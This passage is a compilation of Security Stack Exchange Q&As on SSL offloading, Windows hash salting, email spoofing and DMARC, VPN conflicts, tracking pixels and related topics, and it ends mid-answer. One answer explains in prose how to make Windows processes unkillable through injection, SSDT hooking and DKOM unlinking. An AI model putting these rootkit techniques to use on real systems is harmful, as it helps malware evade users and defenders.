It seems to me the question is "do you trust your own datacenter". In other words, it seems like you're trying to finely draw the line where the untrusted networks lie and the trust begins. In my opinion, SSL/TLS trust should terminate at the SSL offloading device, since the department that manages that device often also manages the networking and infrastructure. There is a certain amount of contractual trust there. There is no point in encrypting data at a downstream server, since the same people who support the network usually have access to this as well (with the possible exception of multi-tenant environments, or unique business requirements that require deeper segmentation). A second reason SSL should terminate at the load balancer is that it offers a centralized place to correct SSL attacks such as CRIME or BEAST. If SSL is terminated at a variety of web servers, running on different OSes, you're more likely to run into problems due to the additional complexity. Keep it simple, and you'll have fewer problems in the long run. That being said: yes, terminate at the load balancer and offload SSL there. Keep it simple. The Citrix Netscaler load balancer (for example) can deny insecure access to a URL. This policy logic, combined with the features of TLS, should ensure your data remains confidential and tamper-free (given that I properly understand your requirement of integrity). Edit: It's possible (and common) to:

- outsource the load balancer (Amazon, Microsoft, etc.)
- use a 3rd-party CDN (Akamai, Amazon, Microsoft, etc.)
- or use a 3rd-party proxy to prevent DoS attacks

... where traffic from that 3rd party would be sent to your servers over network links you don't manage, and therefore may not trust. In that case you should re-encrypt the data, or at the very least have all of that data travel through a point-to-point VPN. Microsoft does offer such a VPN product and allows for secure outsourcing of the perimeter.
{ "source": [ "https://security.stackexchange.com/questions/30403", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20470/" ] }
30,410
Without being a programmer or a computer expert, how can I know if a particular program or any piece of software in general doesn't have hidden unwanted functions compromising privacy and security?
You can know whether some software does only what it announces in the same way that you can know whether the food they serve you at restaurants is poisoned or not. In plain words, you cannot, but Society has come up with various schemes to cope with the issue: You can listen to friends and critics to know if the food at a given restaurant has good reputation or not. You can take a sample and send it to a lab which will look for many (but not all) known poisonous substances. You can ask nicely if you may observe the cook while he prepares the dishes. The cook has a vested business interest in his customer being happy with the food quality, and happiness includes, in particular, not being dead. Society punishes poisoners with the utmost severity and it can usually be assumed that the cook knows it. You always have the extreme option of not eating there if you are too worried. All of these can be directly transposed into the world of software. Extreme methods of ascertaining software quality and adherence to its published behaviour include very expensive and boring things like Common Criteria which boil down to, basically, knowing who made the program and with what tools. Alternative answer: every piece of software has bugs, so it is 100% guaranteed that it does not do exactly what it is supposed to do. (This assertion includes the software which runs in the dozen or so small computers which are embedded in your car, by the way.)
{ "source": [ "https://security.stackexchange.com/questions/30410", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20474/" ] }
30,654
Pretty straightforward: we use rainbow tables to get users' passwords out of hashes. So why won't Microsoft implement salting of passwords in Windows, i.e. hash(password+salt)? Wouldn't this save a lot of grief, at least when implemented on the SAM file, when dealing with password cracking of local users?
The handling of passwords in a Microsoft OS is complex because they use passwords for many usages. The OS (or its domain controller) will store a hashed version of the password, but there are also values which are symmetrically encrypted with keys derived from the password or from the hash thereof. The authentication protocols do not include provisions for exchanging salts when some hashing must occur client side. It is difficult to alter the password processing algorithms without impacting a lot of subsystems and potentially breaking the backward compatibility, which is the driving force of the Windows ecosystem. It goes down to strategic priorities. Microsoft knows that altering password hashing and authentication protocols to include a salt will have some non-negligible costs which they would have to assume (by fixing all the components which are thus affected). On the other hand, not changing the password hashing is rather "free" for them, because a flaky hashing algorithm will not convince customers to switch to other non-Microsoft systems (the OS market is, in practice, a captive market ); it takes a lot more to force potential customers to envision an OS switch which is very expensive. Also, password hashing can arguably be qualified as "defence in depth" , a second layer which has any impact only once a breach already occurred; as such, it could be presented as being of secondary importance. Therefore, it is logical, if irritating, that Microsoft does not update its poor password processing practices. Historically, Microsoft did only one update, when they switched from NTLM v1 to v2, and it was kind of necessary because the older LM hash was so weak that it was beginning to be embarrassing . My guess is that it involved a lot of internal hassle and they are not eager to do it again.
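To make the rainbow-table point concrete, here is a small Python sketch using SHA-256 as a stand-in hash (the real NT hash is unsalted MD4 over the UTF-16LE password, which is beside the point here): without a salt, equal passwords always yield equal hashes, which is exactly what precomputed tables exploit.

```python
import hashlib
import os

password = b"hunter2"

# Unsalted: the same password hashes to the same value everywhere, forever,
# so one precomputed (rainbow) table covers every account and every machine.
print(hashlib.sha256(password).hexdigest() == hashlib.sha256(password).hexdigest())  # True

# Salted: a random per-account value makes each stored hash unique,
# so precomputed tables no longer apply.
h1 = hashlib.sha256(os.urandom(16) + password).hexdigest()
h2 = hashlib.sha256(os.urandom(16) + password).hexdigest()
print(h1 == h2)  # False
```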
{ "source": [ "https://security.stackexchange.com/questions/30654", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6004/" ] }
30,732
With so many popular e-mail providers forcing users to log on to their SMTP servers, why is it still possible to forge the "From:" header in e-mails? What prevents users from simply discarding e-mails in which the source domain of the sender doesn't match the domain of the SMTP server?
tl;dr

- It's very easy to spoof a domain even with SPF controls enabled. The solution is to use DKIM + DMARC, or SPF + DMARC.
- The email client is responsible for telling you if the message passes DMARC Display From verification.
- The email protocol allows for legitimate spoofing using Resent-* headers and Sender headers. The email client (MUA) should display this exception whenever it exists.

There are a few misconceptions about SPF, namely:

- SPF does not prevent email spoofing.
- SPF alone doesn't affect, influence or control the RFC 2822 Display From.
- By default, the usefulness of SPF is to prevent backscatter issues and very simple spoofing scenarios.

Microsoft attempted to solve this issue with SenderID (making SPF apply to the Display From address), but it was too complicated and didn't really solve the whole problem.

Some background

First know that there are two "from" addresses and two "to" addresses in every SMTP message. One is known as the RFC 2821 envelope, the other is the RFC 2822 message. They serve different purposes.

The Envelope (RFC 2821): The envelope is metadata that doesn't appear in the SMTP header. It disappears when the message goes to the next MTA. The MAIL FROM: is where the NDRs will go. If a message is coming from Postmaster or a remailer service this is usually <> or [email protected]. It's interesting to see that Salesforce, similarly to Constant Contact, uses this as a key in a database, like [email protected], to see if the message bounced. The RCPT TO: is who the message is actually being sent to. It is used for "to" and "bcc" users alike. This doesn't usually affect the "display of addresses" in the mail client, but there are occasions where MTAs will display this field (if the RFC 2822 headers are corrupt).

The Message (RFC 2822): The message portion begins when the DATA command is issued. This information includes the SMTP headers you're familiar with, the message, and its attachments. Imagine all this data being copied and pasted from each MTA to the next, in succession, until the message reaches the inbox. It is customary for each MTA to prefix the above-mentioned copy-and-paste with information about the MTA (source IP, destination IP, etc). It also pastes the SPF check details. This is where the Display From is placed. This is important: spoofers are able to modify this. The Mail From: in the envelope is discarded and usually placed here as the Return-Path: address for NDRs.

So how do we prevent people from modifying the Display From? Well, DMARC redefines a second meaning for the SPF record. It recognizes that there is a difference between the Envelope From and the Display From, and that there are legitimate reasons for them not to match. Since SPF was originally defined to only care about the Envelope From, if the Display From is different, DMARC will require a second DNS check to see if the message is allowed from that IP address. To allow for forwarding scenarios, DMARC also allows the Display From to be cryptographically signed by DKIM, and if any unauthorized spammer or phisher were to attempt to assume that identity, the signature would fail.

What is DKIM? DKIM is a lightweight cryptographic technology that signs the data residing in the message. If you ever received a message from Gmail, Yahoo, or AOL, then your messages were DKIM-signed. The point is that no one will ever know you're using DKIM signing unless they look in the headers. It's transparent. DKIM can usually survive being forwarded and transferred to different MTAs -- something that SPF can't do.
Email administrators can use this to their advantage to prevent spoofing. The problem lies with SPF only checking the RFC 2821 envelope, and not the Display From. Since most people care about the Display From shown in an email message, and not the return-path NDR address, we need a solution to protect and secure this piece. This is where DMARC comes in. DMARC allows you to use a combination of a modified SPF check or DKIM to verify the Display From. DKIM allows you to cryptographically sign the RFC 2822 Display From whenever the SPF doesn't match the Display From (which happens frequently).

Your questions

Why is it still possible to forge the "From:" header in e-mails? Some server administrators haven't implemented the latest technologies to prevent this sort of thing from happening. One of the major things preventing adoption of these technologies is "email forwarding services" such as mailing list software, auto-forwarders, or school alumni remailers (.forwarder). Namely:

- Either SPF or DKIM isn't configured.
- A DMARC policy isn't set up.
- The email client isn't displaying the verification results of the Display From and the Resent-* or Sender field.

What prevents users from simply discarding the e-mails in which the source domain of the sender doesn't match the domain of the SMTP server? What doesn't match: the envelope or the body? Well, according to the email standards, the envelope isn't expected to match if the message is going through a remailer. In that case we need to DKIM-sign the Display From and make sure the MUA verifies this. Finally, the MUA (email client) needs to show whether the sender is DMARC-verified, and whether someone is trying to override that with a Sender or Resent-From header.
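For a concrete view of what those controls look like in DNS, here is a small sketch using the third-party dnspython package (an assumption; any DNS tool such as dig would do) that fetches a domain's SPF record and its DMARC policy; example.com is a placeholder.

```python
import dns.resolver  # third-party: dnspython 2.x

def txt_records(name):
    try:
        return [r.to_text() for r in dns.resolver.resolve(name, "TXT")]
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return []

domain = "example.com"
spf   = [t for t in txt_records(domain) if "v=spf1" in t]                 # envelope policy
dmarc = [t for t in txt_records("_dmarc." + domain) if "v=DMARC1" in t]   # Display From policy
print(spf, dmarc)
```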
{ "source": [ "https://security.stackexchange.com/questions/30732", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15648/" ] }
30,754
I have 2 choices for sending data between 2 web applications.

1. I encode the data in Base64, append it to the URL, then retrieve these parameters at my destination application and decode them. For example: http:/myDomain/someCode/pages/somePage.jsf?pin=MzAwMDY3MDI2OQ

2. Send the parameters as hidden values from application1 to application2:

String res = (String) request.getAttribute("paramValue");
document.myForm.action = 'myDestinationURL';
document.myForm.method = "POST";
document.myForm.submit();

<form name="myForm" method="post">
  <input type="hidden" name="paramValue" value="<%=res%>" />
</form>

In Choice 1, one can see the parameters that I am sending and my encoding technique. In Choice 2, one can easily view the data that I am sending by doing a view-source. Apart from the above, what possible ways exist for an intruder to know my system better? And which option is more suitable in general for a developer: Choice 1 or Choice 2?
Option 1 may introduce a number of non-security related issues anyway: The resulting URL may be cached by the browser, or bookmarked, causing users to resubmit. The resulting URL may be shared by users, causing third parties to submit. The URL may be sent to your browser vendor , who may hit the site. But this is about security, and it introduces a few risks not present in option 2: The URL with its parameter may end up in the proxy logs of everything along the way, revealing your data. Your decode function is now an additional attack vector. (Does it handle unicode correctly? Does it have length restrictions?) You may be tempted to think of your encoded string as somehow secure, when it's just security through obscurity (and not very much obscurity), or perhaps more appropriately, security theatre . That said though; they are otherwise largely equivalent in the security they offer . They both submit plain text data in the HTTP header, and base64 isn't exactly rocket science (and you can base64 encode your POST version). Neither offers any meaningful protection for your data. If it's information you don't want the user to see; why are you sending it to the user to begin with? Consider the architecture you're using and see if there's a way to simply remove the risk entirely by not handling that information on the client side. So, to answer the question: with regards to sending data - both reveal the same information to an attacker; choose whichever option is more appropriate for the situation ( this Treehouse blog post may help with that ), but you should not rely on either method to actually protect anything.
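To underline the point that Base64 is obscurity rather than protection, the value from the example URL in the question decodes instantly with any standard library; a Python one-liner (with the "==" padding restored):

```python
import base64

# The query-string value from the question's example URL.
print(base64.b64decode("MzAwMDY3MDI2OQ=="))  # b'3000670269'
```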
{ "source": [ "https://security.stackexchange.com/questions/30754", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15520/" ] }
30,876
I am running an Android phone without a SIM card. I am using it for web surfing. Can the police locate my phone using the cell towers (BTS)? In other words, I know Android phones emit radio signals even if there is no SIM inserted. Can the service provider use these signals to detect where my phone is?
A SIM identifies you with your network operator; it is necessary to be able to receive calls and to bill you for calls you make. Without a SIM, a phone is mostly useless as a phone, but it can still make emergency calls (in most countries). Without a SIM, your cell phone will not normally transmit data to local base stations, but if you make an emergency call, it will identify itself with the cell tower by sending its IMEI. So there is some information identifying your phone that can travel on the cell phone network, but only at your own behest. I don't know how easily the police can access this information. If you've turned off GSM altogether and are only connected through wifi, it's a different matter. The wifi access point knows your phone's MAC address. Whether (or how easily) the police has access to that depends on who owns the access point. Beyond that, your internet traffic does not inherently contain information that identifies your phone, but there is a lot of indirect information. Your IP address will pinpoint at least the access point's ISP and your general location, and with the cooperation of the access point owner your access can be tracked back to the access point by someone who is trying to trace your traffic. The content of your traffic may or may not identify you or your phone, for example through browser fingerprinting, or simply because you logged in to some online account. If someone is in the vicinity of the access point, they can physically locate your phone by measuring its radio signal.
{ "source": [ "https://security.stackexchange.com/questions/30876", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20750/" ] }
30,928
In a web app, should one strive to hide as much of the code as possible, for example from view-source? In particular I was wondering whether JavaScript should be hidden, especially code used for Ajax. I was thinking that if the JavaScript were in an external file, the file could either not be on the web server or be restricted using .htaccess. EDIT: I realize I can't completely prevent the user from seeing JavaScript, as it's interpreted on their end. However, I was wondering whether there is a point in deterring them from viewing such code, for example by making it slightly harder than simply typing in www.mywebsite.com/how_login_is_done.js
Javascript code executes on the client browser, so the client browser sees the code, and every user can obtain it. At best you can obfuscate the code so as to (try to) hide its meaning and behaviour. Obfuscation will not deter motivated attackers (it will just make them a bit angrier), so it would be quite unwise to use it as the foundation for your security model. If you want to hide code, don't send it to the attacker's machine; keep it on the server side.
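As a quick illustration of why hiding the file or deterring "view source" does not help: if the browser can fetch and run the script, any other HTTP client can fetch it too. A minimal sketch using only the Python standard library (the URL is the hypothetical one from the question):

```python
from urllib.request import urlopen

# Any script the browser can run, anyone can download.
url = "https://www.mywebsite.com/how_login_is_done.js"  # hypothetical URL from the question
with urlopen(url) as resp:
    print(resp.read().decode("utf-8", errors="replace"))
```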
{ "source": [ "https://security.stackexchange.com/questions/30928", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10714/" ] }
30,934
I wonder what read / write permissions should I set on my cron files (php files) so they can be executed only by our server. We're using CentOS 5.9 - 64bit and cPanel / WHM + Apache. Thanks!
{ "source": [ "https://security.stackexchange.com/questions/30934", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6956/" ] }
30,947
My PSP is acting like it could possibly be infected. It is locking up and then turns off during game play. There are also problems during games that could be related. This is a replacement PSP machine because I thought my old one was defective but now this one is doing the same thing. Someone in customer service claimed it couldn't be infected but now I have my doubts. I am using the same memory stick and some of the same data that was stored on the old console. I've never visited any suspicious web sites or installed any software that wasn't either pre-installed or from the Playstation store. I also downloaded the Music Unlimited service from the Sony website. I have only updated the firmware using the update function on the console. I've suspected for years that my computer may be infected by something undetected and I used the same WI-FI network with both consoles. I had also connected the original PSP Go to the computer with a USB cable to transfer digital copies of movies.
{ "source": [ "https://security.stackexchange.com/questions/30947", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20792/" ] }
30,961
Recently a free service came out for email tracking, bananatag . It's able to track the fact that the email was read in gmail without any notice or strange inclusions in the email body. In this case I have two questions: How can I block the bananatag? How does actually this service work?
It's all in the knowledgebase: https://web.archive.org/web/20140926051535/http://blog.bananatag.com/knowledgebase/how-opens-work/ We use the same technology as mass-email-marketing companies to track our Opens. This is achieved by inserting a small image in the message or Tracking Pixel into the message. When the image is downloaded you get an Open. As a recipient of such a message who does not wish to be tracked you must either block image fetching from the bananatag servers (assuming they are easily identifiable), block images which look like tracking URLs or are smaller than a certain size, or simply block images altogether.
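A rough sketch of the last suggestion, scanning an HTML email body for likely tracking pixels with the Python standard library; the host names in the blocklist are assumptions for illustration, not confirmed tracker domains:

```python
from html.parser import HTMLParser

# Hypothetical tracker hosts; a real filter would use a maintained blocklist.
SUSPECT_HOSTS = ("bananatag.com", "tracker.example.net")

class PixelFinder(HTMLParser):
    """Flags <img> tags that look like tracking pixels (tiny, or from a suspect host)."""
    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)
        src = a.get("src", "") or ""
        tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
        if tiny or any(host in src for host in SUSPECT_HOSTS):
            print("Possible tracking pixel:", src)

PixelFinder().feed('<p>Hi!</p><img src="https://tracker.example.net/t?id=42" width="1" height="1">')
```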
{ "source": [ "https://security.stackexchange.com/questions/30961", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6427/" ] }
30,976
I know that HTTP requests can be sniffed, so a sniffer can see the requested URL from the victim. Two days ago my bank made me a web account to view balances, send money, etc. The thing I noticed is that my session ID is always in the URL. I copy/pasted it into another browser and successfully logged in from it without entering a username/password (in the new browser). So my question is: are https:// (GET) links sniffable over the wire (e.g., with ettercap)? Should I be worried?
HTTPS uses TLS, which is Transport Layer Security. HTTP, as a protocol, runs above the transport layer. This means that all of the communication made over HTTPS, including the URL, is protected. Passing the session ID in the URL is insecure for other reasons, however. For example, it exposes the possibility of Session Fixation. The session ID gets written to paper if a user prints a webpage. It also defeats the use of HTTPOnly cookies... This is just a bad idea, and it's likely that this bank has made other poor choices in regards to security.
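For contrast, a minimal standard-library sketch of the safer pattern: a random session token delivered in a cookie with HttpOnly and Secure flags instead of in the URL (the SameSite attribute needs Python 3.8 or later):

```python
import secrets
from http.cookies import SimpleCookie

# A random session token delivered as a cookie, not as a URL parameter.
token = secrets.token_urlsafe(32)

cookie = SimpleCookie()
cookie["session"] = token
cookie["session"]["httponly"] = True   # not readable from JavaScript
cookie["session"]["secure"] = True     # only sent over HTTPS
cookie["session"]["samesite"] = "Lax"  # limits cross-site sending (Python 3.8+)
print(cookie["session"].OutputString())
```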
{ "source": [ "https://security.stackexchange.com/questions/30976", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20819/" ] }
30,985
I am a student, and am genuinely curious about unterminable processes in Windows. For educational purposes, I would like to create an application (possibly in VB6?) which cannot be terminated by a user from Task Manager or taskkill. What are some strategies and exploits that such applications employ to make this possible?
Contrary to what a lot of people believe, there are actually several ways to do this. Some of them are common, some rarely seen. Some of them are weak, some strong. It all depends on how you do it. Let's go through a collection of them: 1. Pre-NT RegisterServiceProcess trick Windows 9x, and other pre-NT operating systems, had an undocumented API in kernel32.dll called RegisterServiceProcess , which (as the name suggests) registers the process as a system service. Once a process had called this function, the operating system considered it critical and would not allow task manager to kill it. This function was removed when NT came around, so it doesn't work on XP or higher. 2. Process naming tricks Back in WinXP, the Task Manager executable contained a hard-coded list of process names that it would refuse to kill, instead displaying a message like the one you mentioned. These basically covered the critical system services such as smss.exe and rpcss.exe . The problem was that the path isn't checked, so any other executable with the same name would result in an un-killable process. This trick doesn't prevent the process from being killed, per se, but rather stops the Windows XP Task Manager from being able to kill the process. It is still possible to use another tool to kill the process. 3. Keep-alive processes These are by far the most common. Two processes are created, and repeatedly check for the other's existence. If one is killed, the other resurrects it. This doesn't stop you from killing the process really, but it does make it annoying to stop the process from coming back. Task Manager includes an option to kill the process tree, which allows you to kill a process and all child processes, which may help fix this issue. When a process is created in Windows, the OS keeps track of the process ID that created it. Kill process tree iterates through all processes and looks for those who have a parent ID equal to the process ID that you're killing. Since keep-alive processes usually work on a repeated polling, you can kill both processes before they notice anything went wrong. A defence against this is to create a dummy process that spawns the keep-alive process, then have that dummy process exit. The main process passes its ID to the dummy process, and the dummy process passes its ID to the keep-alive process, but the chain is broken when the dummy process exits. This leaves both the primary and keep-alive processes running, but makes it impossible to use Task Manager's kill process tree function. Instead, you'd have to write a script to kill them off, or use a tool that allows you to kill multiple processes simultaneously. 4. User-mode hooks via loaded DLLs It is possible to inject a DLL into a running process. In fact, Windows offers a feature to have any DLL loaded into all processes that import user32.dll, for the purposes of extensibility. This method is called AppInit DLLs. Once a DLL is injected, it may manipulate the memory of the process. It is then possible to overwrite the values of certain function pointers such that the call is redirected to a stub routine, which then calls the target function. That stub routine may be used to filter or manipulate the parameters and return values of a function call. This technique is called hooking , and it can be very powerful. In this case, it would be possible to inject a DLL into running processes that hooks OpenProcess and TerminateProcess to ensure that no application can gain a handle to your process, or terminate it. 
This somewhat results in an arms-race, since alternative user-mode APIs can be used to terminate processes, and it's difficult to hook and block them all, especially when we consider undocumented APIs. 5. User-mode hooks via injected threads This trick works the same as with DLLs, except no DLL file is needed. A handle to the target process is created, some memory is allocated within it via VirtualAllocEx , code and data is copied into the memory block via WriteProcessMemory , and a thread is created in the process via CreateRemoteThread . This results in some foreign code being executed within a target process, which may then instigate various hooks to prevent a process being killed. 6. Kernel-mode call hooks In the kernel, there's a special structure called the System Service Dispatch Table (SSDT), which maps function IDs from user-mode calls into function pointers in to kernel APIs. This table is used to transition between user-mode and kernel-mode. If a malicious driver can be loaded, it may modify the SSDT to cause its own function to be executed, instead of the proper API. This is a kernel-mode hook, which constitutes a rootkit. Essentially it is possible to pull the wool over the OS's eyes by returning bogus data from calls. In fact, it is possible to make the process not only un-killable, but also invisible. One issue with this on x64 builds is that the SSDT is protected by Kernel Patch Protection (KPP). It is possible to disable KPP, but this has far-reaching consequences that may make it difficult to develop a rootkit. 7. Direct kernel object manipulation (DKOM) This trick also involves loading a malicious driver on the OS, but doesn't require alteration of the SSDT. Processes on the system are stored as EPROCESS structures in the kernel. Keep in mind that this structure is entirely version-dependant and is only partially documented by Microsoft, so reverse engineering is required across multiple target versions in order to make sure that the code doesn't attempt to read the wrong pointers or data. However, if you can successfully locate and enumerate through EPROCESS structures in the kernel, it is possible to manipulate them. Each entry in the process list has an FLink and BLink pointer, which point to the next and previous processes in the list. If you identify your target process and make its FLink and BLink pointers point back to themselves, and the FLink and BLink of its siblings point to each other, the OS simply skips over your process when doing any housekeeping operations, e.g. killing processes. This trick is called unlinking. Not only does this render the process invisible to the user, but it also prevents all user-mode APIs from targeting the process unless a handle to the process was generated before it was unlinked. This is a very powerful rootkit technique, especially because it's difficult to recover from. 8. Debugger tricks This is a pretty cool trick that I've yet to see in the wild, but it works quite well. The Windows debugger API allows any process to debug another, as long as it has the permissions to do so. If you use the debugger API, it is possible to place a process in a "debugged" state. If this process contains a thread that is currently halted by a debugger, the process cannot be killed by Windows, because proper thread control cannot be guaranteed during termination when the thread is blocked. Of course, if you kill the debugger, the process stops being debugged and either closes or crashes. 
However, it is sometimes possible to produce a situation where a chain of processes exists that debug each other in a loop. If each process halts a dummy thread in the next, none can be killed. Note that it is possible for a power user to manually kill other threads within the process, rendering it useless, but it still won't be killed. 9. Windows 8 DRM This is a new one I've only heard of recently, but I don't know much about it. There was a bit of a rumour going around on Twitter about it, and I've seen snippets here and there on various technical sites, but I've yet to see any concrete research. I think it's still early days. Essentially, the story is that Windows 8 has a mechanism that allows "trusted providers" to register processes as DRM critical, preventing them from being killed or manipulated by the user. Some people have speculated that the mechanism for checking trusted providers is weak, and may be open to attack. (It looks like this one was bogus. So much for the rumor mill!) Update: Harry Johnston pointed out in the comments that Windows 8.1 introduces protected services , which are designed to be used by AV and DRM to protect against being manipulated or attacked by lower-privileged code on the system. 10. Tool manipulation This one has probably been used a lot in the wild, but I've never seen it done properly. Essentially this trick involves targeting specific tools, e.g. Task Manager, by editing the executables on disk in a way that alters functionality. This is very similar to the user-mode hook tricks I mentioned earlier, but in this case they persist on disk and have wider-reaching consequences than simple API hooking. Of course, one issue is that Windows File Protection (WFP) prevents alteration of certain critical system files, including the task manager. Amusingly, though, it is possible to alter the default task manager executable path via the registry. So, instead of messing with the task manager executable file, just dump your own version somewhere and make the OS use it. All in all, there are plenty of ways to achieve this, with varying degrees of robustness. The above represents a majority of them, but isn't exhaustive. In fact, many of the tricks I described can be achieved in alternate ways, using different mechanisms or APIs to achieve the same goal.
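On the defensive side, the parent/child bookkeeping that the keep-alive trick (item 3) tries to defeat is easy to inspect yourself; here is a small sketch using the third-party psutil package (assumed to be installed):

```python
import psutil  # third-party: pip install psutil

def show_tree(pid):
    """Print a process and its descendants: the same parent/child links that
    Task Manager's "kill process tree" walks, and that keep-alive pairs try to break."""
    root = psutil.Process(pid)
    print(root.pid, root.name())
    for child in root.children(recursive=True):
        print(" ", child.pid, child.name(), "(parent:", child.ppid(), ")")

show_tree(psutil.Process().pid)  # inspect the current process as a harmless demo
```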
{ "source": [ "https://security.stackexchange.com/questions/30985", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
31,030
What exactly happens if I connect through two VPN clients on my laptop? For example, I connect using Cisco AnyConnect, and then use another VPN client (such as HotSpot Shield or proXPN) to connect through another tunnel. Will the actual data be decrypted at the first server/site and be in plaintext/visible? I mean, will this happen: data is encrypted at my laptop, sent to server 1, decrypted, then encrypted, sent to server 2 where it's finally decrypted. I doubt it, because the second tunnel is through my client to server 2 , not server 1 to server 2 . Or will it be a tunnel in a tunnel? So: data is encrypted and encapsulated twice at my laptop, decrypted at server 1, but is not yet in plaintext, and would be routed to server 2 where it'll be finally decrypted. Or will the laptop simply pick one tunnel (the latter?) for a normal client-to-site VPN? Or will the second connection not even be established in the first place?
A typical VPN client works like this: it connects to the server, and then it instructs the operating system to give him all packets which are to be sent to any address in a given set. For instance, let's assume that the VPN client advertises that it should handle all packets meant for 10.0.0.0/8 (i.e. all IP addresses which start with "10"). When the OS sees a packet which should go to address "u.v.w.x", it checks whether "u" is "10"; if yes, then it gives the packet to the VPN, which does its magic with it and forwards it, under heavy encryption/MAC/whatever to the server; otherwise, the packet is emitted "to the Internet" as the OS would have done without the VPN client. Details on how this system is implemented depend on the VPN implementation (e.g. it may declare specific "routes"; or it could intercept all outgoing packets with firewalling rules and redirect the packets it is interested in;...). If you have two VPN clients and their "advertised sets of addresses" do not overlap, then chances are that they will live together nicely at the IP level : each will grab the packets for its own virtual network, leaving the other packets untouched. However, they might also fight for the "interception resources" which may result in the first VPN client to be wholly deactivated. On the other hand, if both VPN advertise overlapping sets of addresses, then trouble is pretty much guaranteed. If you are lucky, the second VPN will refuse to run with an explicit message. Otherwise, one of the clients may take precedence, possibly intermittently, and things will be weird and confusing. Possibly, one VPN server will receive the packets which were due for the other VPN, thus incurring a severe data leak. There will be trouble with DNS . Applications and humans do not want to deal with IP addresses but with host names . The DNS converts host names to IP addresses. A VPN being a "virtual private network", it uses names which are not visible to the worldwide, Internet DNS. Therefore, a VPN client will not only intercept IP packets, but also the name resolution system, and redirect some (if not all) of name resolution requests to a dedicated DNS server on the VPN. Your two VPN clients will compete for that redirection. Things might just work well if the clients manage to redirect requests for just some domains. But chances are that hijinks will ensue. Some names for one VPN will probably cease to be convertible to IP addresses, resulting in reduced functionality. Possibly, one VPN will receive name resolutions for the other VPN, so not only is the functionality broken (because the DNS in one VPN will not know what to do with names from the other VPN) but some private data leaks from one VPN to another (host names are rarely very sensitive, but that's still a leakage). In this last situation, the VPN which receives name resolution requests for private names of the other VPN is in ideal position to respond with forged DNS answers and redirect all traffic from the other VPN to itself. So don't do that . Running several VPN clients concurrently is a source of trouble, hard-to-diagnose failures and potential data leaks. To avoid issues with multiple VPN , you should endeavour to use more "controlled" forms of VPN. For instance, a SOCKS proxy with ssh . This would allow you to run one Web browser which redirect all its traffic to another host (the "VPN server") while leaving the rest of the machine (and, crucially, other browser instances) unaltered. See this answer for instance. 
Some purists say that such proxying is not a VPN, but for many practical purposes (anything which is Web-based, really), this is functionally equivalent. See also the alternative with port-based tunnels. I used to do that a lot at one time (a dozen or so port-based tunnels, and also SOCKS proxying, and it was all working well). The SOCKS solution works well for name resolution too: the name resolutions requests from the Web browser will go through the tunnel, to be resolved on the other side (i.e. in the VPN), without touching the local DNS configuration. Port-based tunnels require a static local name declaration.
{ "source": [ "https://security.stackexchange.com/questions/31030", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20871/" ] }
31,049
Recently, a website related to our university was hacked along with many others . This led to a general discussion 1 on how to secure the website in the future. Anyway, there is one point that was discussed quite a bit. Assuming that one is a competent developer, is it better to "code from scratch" (write your own homebrew framework to host the site), or is it better to use a popular framework that is freely available? I understand that this may not have a simple "yes/no" answer. I'm looking for some explanation as to when each option is favorable. Or a detailed comparison of the two options would be nice as well. 1 If anyone wants, this is the mailing list thread , but it talks about other things as well and you probably don't want to look at it ;-)
You certainly want your code to be written by the most skilled developer possible, but that's not enough. Even the most competent developers make mistakes (though less competent ones obviously tend to make more mistakes). To get relatively mistake-free code and algorithms, you want to start out with the cleanest code possible, but that's only half the process. The best way to eliminate faults is to have as many skilled developers as possible comb through the code looking for them. This holds true for code as much as it does for algorithms. Your solution needs to be widely vetted by the most experienced people possible. Where you start -- the skill level of the original developer -- is just the starting point. After sufficient review, it doesn't really matter how skilled the original developer was. So here's the key: the security value in any code is in how well-vetted it is . Whether it was written by you, by a renowned cryptographer, a large corporation, or nobody in particular, all that matters is how many skilled eyes have scrutinized the code. Such a rule tends to favor established frameworks over homespun solutions. But established is not necessarily the same as vetted , which is part of why many security experts tend to favor open-source solutions: it's difficult for an open-source project to become popular without it being subjected to a certain amount of scrutiny.
{ "source": [ "https://security.stackexchange.com/questions/31049", "https://security.stackexchange.com", "https://security.stackexchange.com/users/7497/" ] }
31,139
I have a small question regarding how X.509 works. I am aware of OpenPGP encryption/decryption, where we generate a public key and a private key. We can share the public key with vendors, they can encrypt data with that key, and we can decrypt the data using our private key. That is simple and straightforward to me. When it comes to X.509, I am a bit confused. My client wants to use an X.509 certificate to transfer sensitive information [which is already encrypted using symmetric encryption like AES] between two parties [the client and his vendors]. How does X.509 work if we can generate the certificate using only a public key? Assume I encrypt the data using AES with one randomly generated key. How do I transfer this data along with the key to the vendor using X.509 so that no third party can intercept it during network transmission? Could anyone please explain? By the way, we transfer the data in a SOAP message including the certificate info.
X.509 is a format for certificates : a certificate is a sequence of bytes which contains, in a specific format, a name and a public key , over which a digital signature is computed and embedded in the certificate. The signer is a Certification Authority which asserts that the public key is indeed owned by the entity known under that name. By verifying the signature, you can make sure that the certificate is genuine, i.e. is really what the CA issued; and, that way, you gain trust in the binding of name with public key (insofar as you trust the CA for being honest and not too gullible, and as you know the CA key for signature verification, which may entail obtaining a certificate for the CA, and verifying that certificate, and so on, up to a trust anchor aka root certificate ). Thus, X.509 is a way to distribute public keys , by which I mean: a method which allows various actors (e.g. you) to know, with some guarantee of non alteration by malicious third parties (i.e. "attackers") the public keys of other actors. OpenPGP is a standard format for a lot of things. One of the things which OpenPGP defines is a way to encode a public key along with a "name" (an email address), and a signature over these two. That's, really, a certificate in its own right (although with a format which is not compatible with X.509). But OpenPGP also defines how to use the public key of a given individual (let's call him Butch) in order to encrypt a bunch of bytes that only Butch, using his private key, will be able to decrypt. Technically, this uses a randomly generated session key, used with AES (or similar) to encrypt the raw data, and that session key is what is encrypted with the recipient's public key (generally of 